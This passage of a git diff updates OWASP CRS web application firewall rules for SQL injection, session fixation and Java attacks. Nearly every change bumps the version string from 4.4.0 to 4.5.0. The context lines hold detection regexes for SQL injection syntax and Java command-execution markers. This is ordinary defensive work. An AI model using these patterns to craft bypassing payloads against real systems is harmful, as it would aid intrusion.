ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -695,7 +695,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -715,7 +715,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -735,7 +735,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -755,7 +755,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -775,7 +775,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -795,7 +795,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -815,7 +815,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -835,7 +835,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -855,7 +855,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -867,7 +867,7 @@ SecRule ARGS_GET:fbclid "@rx [a-zA-Z0-9_-]{61,61}" \ nolog,\ tag:'OWASP_CRS',\ ctl:ruleRemoveTargetById=942440;ARGS:fbclid,\ - ver:'OWASP_CRS/4.4.0'" + ver:'OWASP_CRS/4.5.0'" SecRule ARGS_GET:gclid "@rx [a-zA-Z0-9_-]{91,91}" \ "id:942442,\ phase:2,\ @@ -876,7 +876,7 @@ SecRule ARGS_GET:gclid "@rx [a-zA-Z0-9_-]{91,91}" \ nolog,\ tag:'OWASP_CRS',\ ctl:ruleRemoveTargetById=942440;ARGS:gclid,\ - ver:'OWASP_CRS/4.4.0'" + ver:'OWASP_CRS/4.5.0'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx /\*!?|\*/|[';]--|--(?:[\s\x0b]|[^\-]*?-)|[^&\-]#.*?[\s\x0b]|;?\x00" \ "id:942440,\ phase:2,\ @@ -893,7 +893,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "!@rx ^ey[\-0-9A-Z_a-z]+\.ey[\-0-9A-Z_a-z]+\.[\-0-9A-Z_a-z]+$" \ @@ -916,7 +916,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -936,7 +936,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -956,7 +956,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -976,7 +976,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.942521_matched_var_name=%{matched_var_name}',\ chain" @@ -1000,7 +1000,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ^.*?\x5c['\"`](?:.*?['\"`])?\s*(?:and|or)\b" tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1020,7 +1020,7 @@ SecRule REQUEST_BASENAME|REQUEST_FILENAME "@detectSQLi" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1040,7 +1040,7 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd( tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1060,12 +1060,12 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)create[\s\x0 tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\W+\d*?\s*?\bhaving\b\s*?[^\s\-]" \ "id:942251,\ phase:2,\ @@ -1082,7 +1082,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1102,7 +1102,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1122,7 +1122,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1142,7 +1142,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1162,7 +1162,7 @@ SecRule ARGS "@rx \W{4}" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}'" @@ -1182,7 +1182,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1202,12 +1202,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){3})" \ "id:942421,\ phase:1,\ @@ -1224,7 +1224,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1244,7 +1244,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" diff --git a/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf index 60531c5..13ad9fe 100644 --- a/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf +++ b/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)" \ "id:943100,\ phase:2,\ @@ -24,7 +24,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -43,7 +43,7 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.943110_matched_var_name=%{matched_var_name}',\ chain" @@ -68,17 +68,17 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.943120_matched_var_name=%{matched_var_name}',\ chain" SecRule &REQUEST_HEADERS:Referer "@eq 0" \ "setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" SecMarker "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" diff --git a/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf index 5d34c36..8711843 100644 --- a/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf +++ b/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ "@rx java\.lang\.(?:runtime|processbuilder)" \ "id:944100,\ @@ -25,7 +25,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -45,7 +45,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:unmarshaller|base64data|java\.)" \ @@ -67,7 +67,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \ @@ -89,7 +89,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -108,7 +108,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -127,12 +127,12 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" 